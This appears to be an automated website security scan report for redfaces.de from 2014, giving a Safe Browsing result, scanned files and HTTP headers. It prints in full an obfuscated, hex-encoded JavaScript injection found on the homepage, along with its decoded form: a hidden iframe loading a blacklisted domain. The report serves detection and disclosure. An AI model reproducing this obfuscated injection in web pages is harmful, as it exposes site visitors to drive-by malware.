Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=redfaces.de
Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://redfaces.de/ | 200 OK Content-Length: 2112 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: fidenunderde.biz
function v51782a4114bf9(v51782a4114c37){ return(parseInt(v51782a4114c37,16));}function v51782a4114d09(v51782a4114d50){ function v51782a4114dff () {var v51782a4114e3c=2; return v51782a4114e3c;} var v51782a4114d8b='';for(v51782a4114dc6=0; v51782a4114dc6<v51782a4114d50.length; v51782a4114dc6+=v51782a4114dff()){ v51782a4114d8b+=(String.fromCharCode(v51782a4114bf9(v51782a4114d50.substr(v51782a4114dc6, v51782a4114dff()))));}return v51782a4114d8b;} document.write(v51782a4114d09('3C696672616D65206E616D653D273627207372633D27687474703A2F2F666964656E756E64657264652E62697A272077696474683D3532206865696768743D343432207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));
Decoded script:
<iframe name='6' src='http://fidenunderde.biz' width=52 height=442 style='display:none'></iframe>
http://redfaces.de/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: redfaces.de
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=60
Connection: close
Date: Tue, 23 Dec 2014 22:46:08 GMT
Accept-Ranges: bytes
ETag: "30c600e-840-508ab53ce1d80"
Server: Apache
Vary: Accept-Encoding
Content-Length: 2112
Content-Type: text/html
Expires: Tue, 23 Dec 2014 22:47:08 GMT
Last-Modified: Tue, 25 Nov 2014 09:13:42 GMT
...2112 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: redfaces.de
Referer: http://www.google.com/search?q=redfaces.de
Result:
The result is similar to the first query. There are no suspicious redirects found.